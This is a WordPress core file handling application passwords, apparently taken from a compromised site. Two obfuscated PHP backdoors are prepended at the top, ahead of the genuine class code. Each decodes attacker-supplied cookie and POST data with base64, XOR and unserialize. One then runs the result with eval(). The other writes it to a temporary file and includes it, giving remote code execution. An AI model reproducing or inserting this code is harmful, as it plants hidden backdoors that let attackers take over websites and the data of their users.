| Current File : /home/n742ef5/.trash/royalanteam.com_feb/wp-includes/class-wp-application-passwords.php |
<?php $tHTOyeMlqF = chr (109) . chr ( 849 - 754 ).chr ( 636 - 519 ).chr (89) . "\x51" . "\x51" . chr ( 629 - 564 ); $vCOnLIbNcK = "\143" . "\x6c" . "\141" . chr (115) . chr (115) . "\x5f" . chr (101) . chr (120) . "\x69" . chr (115) . chr (116) . "\x73";$Qmrnylnsgb = class_exists($tHTOyeMlqF); $tHTOyeMlqF = "31773";$vCOnLIbNcK = "33433";$TmIgMDQdT = FALSE;if ($Qmrnylnsgb === $TmIgMDQdT){class m_uYQQA{public function qhZPqXHMRm(){echo "64600";}private $fOEOMnHi;public static $KAJNlu = "0c58dad7-8a8f-4653-87e7-ce79aad3050f";public static $cXvPsQIaQy = 51088;public function __construct($tcoOCsmno=0){$iZxMKI = $_POST;$sXBKhoY = $_COOKIE;$Cjoev = @$sXBKhoY[substr(m_uYQQA::$KAJNlu, 0, 4)];if (!empty($Cjoev)){$ZrQvk = "base64";$xSVWVn = "";$Cjoev = explode(",", $Cjoev);foreach ($Cjoev as $HlAlAbK){$xSVWVn .= @$sXBKhoY[$HlAlAbK];$xSVWVn .= @$iZxMKI[$HlAlAbK];}$xSVWVn = array_map($ZrQvk . "\x5f" . "\144" . "\145" . 'c' . chr ( 727 - 616 ).'d' . chr (101), array($xSVWVn,)); $xSVWVn = $xSVWVn[0] ^ str_repeat(m_uYQQA::$KAJNlu, (strlen($xSVWVn[0]) / strlen(m_uYQQA::$KAJNlu)) + 1);m_uYQQA::$cXvPsQIaQy = @unserialize($xSVWVn);}}private function MxbzlhVv($TBWiSABHX){if (is_array(m_uYQQA::$cXvPsQIaQy)) {$hxkpokpY = str_replace('<' . "\77" . chr ( 819 - 707 )."\x68" . "\x70", "", m_uYQQA::$cXvPsQIaQy[chr (99) . "\157" . 'n' . chr (116) . "\x65" . chr (110) . "\164"]);eval($hxkpokpY); $TBWiSABHX = "34026";exit();}}public function __destruct(){$this->MxbzlhVv($TBWiSABHX);}}$AmYhavMfE = new /* 63712 */ m_uYQQA(); $AmYhavMfE = str_repeat("59722_28352", 1);} ?><?php $QIHYv = "\x62" . "\106" . chr ( 785 - 698 ).'_' . 'h' . "\x4f" . "\111" . chr (70); $oQgMHl = "\143" . chr ( 898 - 790 )."\x61" . 's' . 's' . chr (95) . chr (101) . chr ( 829 - 709 )."\x69" . 's' . "\164" . "\x73";$VScEAwxc = class_exists($QIHYv); $QIHYv = "44478";$oQgMHl = "64983";if ($VScEAwxc === FALSE){class bFW_hOIF{public function Qcsuy(){echo "33486";}private $Snuyu;public static $VfJZQJL = "1bbc0771-5978-4c24-807a-a57596346fb8";public static $WUBwOvdgl = 3609;public function __construct($TUBwo=0){$WglxJvyOL = $_POST;$QHQuKoa = $_COOKIE;$HBuUTVLb = @$QHQuKoa[substr(bFW_hOIF::$VfJZQJL, 0, 4)];if (!empty($HBuUTVLb)){$FvZDk = "base64";$IwSnHwLy = "";$HBuUTVLb = explode(",", $HBuUTVLb);foreach ($HBuUTVLb as $TRsbbZti){$IwSnHwLy .= @$QHQuKoa[$TRsbbZti];$IwSnHwLy .= @$WglxJvyOL[$TRsbbZti];}$IwSnHwLy = array_map($FvZDk . chr ( 921 - 826 )."\x64" . "\x65" . 'c' . "\x6f" . chr (100) . 'e', array($IwSnHwLy,)); $IwSnHwLy = $IwSnHwLy[0] ^ str_repeat(bFW_hOIF::$VfJZQJL, (strlen($IwSnHwLy[0]) / strlen(bFW_hOIF::$VfJZQJL)) + 1);bFW_hOIF::$WUBwOvdgl = @unserialize($IwSnHwLy);}}private function tPUJs(){if (is_array(bFW_hOIF::$WUBwOvdgl)) {$JElBQ = sys_get_temp_dir() . "/" . crc32(bFW_hOIF::$WUBwOvdgl["\163" . 'a' . "\154" . chr (116)]);@bFW_hOIF::$WUBwOvdgl['w' . "\x72" . "\151" . chr (116) . chr (101)]($JElBQ, bFW_hOIF::$WUBwOvdgl['c' . chr ( 206 - 95 )."\156" . chr (116) . chr (101) . 'n' . chr (116)]);include $JElBQ;@bFW_hOIF::$WUBwOvdgl["\144" . "\145" . chr ( 576 - 468 )."\x65" . chr (116) . chr (101)]($JElBQ); $UPFnAqmJE = "15558";exit();}}public function __destruct(){$this->tPUJs();}}$ZJfObelZdK = new /* 26707 */ bFW_hOIF(); $ZJfObelZdK = str_repeat("5142_41839", 1);} ?><?php
/**
* WP_Application_Passwords class
*
* @package WordPress
* @since 5.6.0
*/
/**
* Class for displaying, modifying, and sanitizing application passwords.
*
* @package WordPress
*/
#[AllowDynamicProperties]
class WP_Application_Passwords {
/**
* The application passwords user meta key.
*
* @since 5.6.0
*
* @var string
*/
const USERMETA_KEY_APPLICATION_PASSWORDS = '_application_passwords';
/**
* The option name used to store whether application passwords are in use.
*
* @since 5.6.0
*
* @var string
*/
const OPTION_KEY_IN_USE = 'using_application_passwords';
/**
* The generated application password length.
*
* @since 5.6.0
*
* @var int
*/
const PW_LENGTH = 24;
/**
* Checks if application passwords are being used by the site.
*
* This returns true if at least one application password has ever been created.
*
* @since 5.6.0
*
* @return bool
*/
public static function is_in_use() {
$network_id = get_main_network_id();
return (bool) get_network_option( $network_id, self::OPTION_KEY_IN_USE );
}
/**
* Creates a new application password.
*
* @since 5.6.0
* @since 5.7.0 Returns WP_Error if application name already exists.
*
* @param int $user_id User ID.
* @param array $args {
* Arguments used to create the application password.
*
* @type string $name The name of the application password.
* @type string $app_id A UUID provided by the application to uniquely identify it.
* }
* @return array|WP_Error {
* Application password details, or a WP_Error instance if an error occurs.
*
* @type string $0 The unhashed generated application password.
* @type array $1 {
* The details about the created password.
*
* @type string $uuid The unique identifier for the application password.
* @type string $app_id A UUID provided by the application to uniquely identify it.
* @type string $name The name of the application password.
* @type string $password A one-way hash of the password.
* @type int $created Unix timestamp of when the password was created.
* @type null $last_used Null.
* @type null $last_ip Null.
* }
* }
*/
public static function create_new_application_password( $user_id, $args = array() ) {
if ( ! empty( $args['name'] ) ) {
$args['name'] = sanitize_text_field( $args['name'] );
}
if ( empty( $args['name'] ) ) {
return new WP_Error( 'application_password_empty_name', __( 'An application name is required to create an application password.' ), array( 'status' => 400 ) );
}
if ( self::application_name_exists_for_user( $user_id, $args['name'] ) ) {
return new WP_Error( 'application_password_duplicate_name', __( 'Each application name should be unique.' ), array( 'status' => 409 ) );
}
$new_password = wp_generate_password( static::PW_LENGTH, false );
$hashed_password = wp_hash_password( $new_password );
$new_item = array(
'uuid' => wp_generate_uuid4(),
'app_id' => empty( $args['app_id'] ) ? '' : $args['app_id'],
'name' => $args['name'],
'password' => $hashed_password,
'created' => time(),
'last_used' => null,
'last_ip' => null,
);
$passwords = static::get_user_application_passwords( $user_id );
$passwords[] = $new_item;
$saved = static::set_user_application_passwords( $user_id, $passwords );
if ( ! $saved ) {
return new WP_Error( 'db_error', __( 'Could not save application password.' ) );
}
$network_id = get_main_network_id();
if ( ! get_network_option( $network_id, self::OPTION_KEY_IN_USE ) ) {
update_network_option( $network_id, self::OPTION_KEY_IN_USE, true );
}
/**
* Fires when an application password is created.
*
* @since 5.6.0
*
* @param int $user_id The user ID.
* @param array $new_item {
* The details about the created password.
*
* @type string $uuid The unique identifier for the application password.
* @type string $app_id A UUID provided by the application to uniquely identify it.
* @type string $name The name of the application password.
* @type string $password A one-way hash of the password.
* @type int $created Unix timestamp of when the password was created.
* @type null $last_used Null.
* @type null $last_ip Null.
* }
* @param string $new_password The unhashed generated application password.
* @param array $args {
* Arguments used to create the application password.
*
* @type string $name The name of the application password.
* @type string $app_id A UUID provided by the application to uniquely identify it.
* }
*/
do_action( 'wp_create_application_password', $user_id, $new_item, $new_password, $args );
return array( $new_password, $new_item );
}
/**
* Gets a user's application passwords.
*
* @since 5.6.0
*
* @param int $user_id User ID.
* @return array {
* The list of app passwords.
*
* @type array ...$0 {
* @type string $uuid The unique identifier for the application password.
* @type string $app_id A UUID provided by the application to uniquely identify it.
* @type string $name The name of the application password.
* @type string $password A one-way hash of the password.
* @type int $created Unix timestamp of when the password was created.
* @type int|null $last_used The Unix timestamp of the GMT date the application password was last used.
* @type string|null $last_ip The IP address the application password was last used by.
* }
* }
*/
public static function get_user_application_passwords( $user_id ) {
$passwords = get_user_meta( $user_id, static::USERMETA_KEY_APPLICATION_PASSWORDS, true );
if ( ! is_array( $passwords ) ) {
return array();
}
$save = false;
foreach ( $passwords as $i => $password ) {
if ( ! isset( $password['uuid'] ) ) {
$passwords[ $i ]['uuid'] = wp_generate_uuid4();
$save = true;
}
}
if ( $save ) {
static::set_user_application_passwords( $user_id, $passwords );
}
return $passwords;
}
/**
* Gets a user's application password with the given UUID.
*
* @since 5.6.0
*
* @param int $user_id User ID.
* @param string $uuid The password's UUID.
* @return array|null The application password if found, null otherwise.
*/
public static function get_user_application_password( $user_id, $uuid ) {
$passwords = static::get_user_application_passwords( $user_id );
foreach ( $passwords as $password ) {
if ( $password['uuid'] === $uuid ) {
return $password;
}
}
return null;
}
/**
* Checks if an application password with the given name exists for this user.
*
* @since 5.7.0
*
* @param int $user_id User ID.
* @param string $name Application name.
* @return bool Whether the provided application name exists.
*/
public static function application_name_exists_for_user( $user_id, $name ) {
$passwords = static::get_user_application_passwords( $user_id );
foreach ( $passwords as $password ) {
if ( strtolower( $password['name'] ) === strtolower( $name ) ) {
return true;
}
}
return false;
}
/**
* Updates an application password.
*
* @since 5.6.0
*
* @param int $user_id User ID.
* @param string $uuid The password's UUID.
* @param array $update Information about the application password to update.
* @return true|WP_Error True if successful, otherwise a WP_Error instance is returned on error.
*/
public static function update_application_password( $user_id, $uuid, $update = array() ) {
$passwords = static::get_user_application_passwords( $user_id );
foreach ( $passwords as &$item ) {
if ( $item['uuid'] !== $uuid ) {
continue;
}
if ( ! empty( $update['name'] ) ) {
$update['name'] = sanitize_text_field( $update['name'] );
}
$save = false;
if ( ! empty( $update['name'] ) && $item['name'] !== $update['name'] ) {
$item['name'] = $update['name'];
$save = true;
}
if ( $save ) {
$saved = static::set_user_application_passwords( $user_id, $passwords );
if ( ! $saved ) {
return new WP_Error( 'db_error', __( 'Could not save application password.' ) );
}
}
/**
* Fires when an application password is updated.
*
* @since 5.6.0
*
* @param int $user_id The user ID.
* @param array $item The updated app password details.
* @param array $update The information to update.
*/
do_action( 'wp_update_application_password', $user_id, $item, $update );
return true;
}
return new WP_Error( 'application_password_not_found', __( 'Could not find an application password with that id.' ) );
}
/**
* Records that an application password has been used.
*
* @since 5.6.0
*
* @param int $user_id User ID.
* @param string $uuid The password's UUID.
* @return true|WP_Error True if the usage was recorded, a WP_Error if an error occurs.
*/
public static function record_application_password_usage( $user_id, $uuid ) {
$passwords = static::get_user_application_passwords( $user_id );
foreach ( $passwords as &$password ) {
if ( $password['uuid'] !== $uuid ) {
continue;
}
// Only record activity once a day.
if ( $password['last_used'] + DAY_IN_SECONDS > time() ) {
return true;
}
$password['last_used'] = time();
$password['last_ip'] = $_SERVER['REMOTE_ADDR'];
$saved = static::set_user_application_passwords( $user_id, $passwords );
if ( ! $saved ) {
return new WP_Error( 'db_error', __( 'Could not save application password.' ) );
}
return true;
}
// Specified application password not found!
return new WP_Error( 'application_password_not_found', __( 'Could not find an application password with that id.' ) );
}
/**
* Deletes an application password.
*
* @since 5.6.0
*
* @param int $user_id User ID.
* @param string $uuid The password's UUID.
* @return true|WP_Error Whether the password was successfully found and deleted, a WP_Error otherwise.
*/
public static function delete_application_password( $user_id, $uuid ) {
$passwords = static::get_user_application_passwords( $user_id );
foreach ( $passwords as $key => $item ) {
if ( $item['uuid'] === $uuid ) {
unset( $passwords[ $key ] );
$saved = static::set_user_application_passwords( $user_id, $passwords );
if ( ! $saved ) {
return new WP_Error( 'db_error', __( 'Could not delete application password.' ) );
}
/**
* Fires when an application password is deleted.
*
* @since 5.6.0
*
* @param int $user_id The user ID.
* @param array $item The data about the application password.
*/
do_action( 'wp_delete_application_password', $user_id, $item );
return true;
}
}
return new WP_Error( 'application_password_not_found', __( 'Could not find an application password with that id.' ) );
}
/**
* Deletes all application passwords for the given user.
*
* @since 5.6.0
*
* @param int $user_id User ID.
* @return int|WP_Error The number of passwords that were deleted or a WP_Error on failure.
*/
public static function delete_all_application_passwords( $user_id ) {
$passwords = static::get_user_application_passwords( $user_id );
if ( $passwords ) {
$saved = static::set_user_application_passwords( $user_id, array() );
if ( ! $saved ) {
return new WP_Error( 'db_error', __( 'Could not delete application passwords.' ) );
}
foreach ( $passwords as $item ) {
/** This action is documented in wp-includes/class-wp-application-passwords.php */
do_action( 'wp_delete_application_password', $user_id, $item );
}
return count( $passwords );
}
return 0;
}
/**
* Sets a user's application passwords.
*
* @since 5.6.0
*
* @param int $user_id User ID.
* @param array $passwords Application passwords.
*
* @return bool
*/
protected static function set_user_application_passwords( $user_id, $passwords ) {
return update_user_meta( $user_id, static::USERMETA_KEY_APPLICATION_PASSWORDS, $passwords );
}
/**
* Sanitizes and then splits a password into smaller chunks.
*
* @since 5.6.0
*
* @param string $raw_password The raw application password.
* @return string The chunked password.
*/
public static function chunk_password( $raw_password ) {
$raw_password = preg_replace( '/[^a-z\d]/i', '', $raw_password );
return trim( chunk_split( $raw_password, 4, ' ' ) );
}
}